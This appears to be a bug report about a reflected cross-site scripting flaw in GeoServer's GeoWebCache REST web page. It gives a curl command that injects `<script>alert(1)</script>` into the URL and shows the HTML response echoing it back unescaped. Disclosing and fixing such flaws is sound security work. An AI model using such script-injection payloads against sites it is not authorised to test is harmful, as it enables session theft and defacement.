|
Running
curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'
yields an answer with unescaped HTML:
<html><body>
<a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
<h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer by appending the name of the layer to the URL, DELETE an existing layer or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
<li><h4>seed</h4></li>
</ul></body></html>
Looks like the problem is similar to  GEOS-7549 Resolved .
|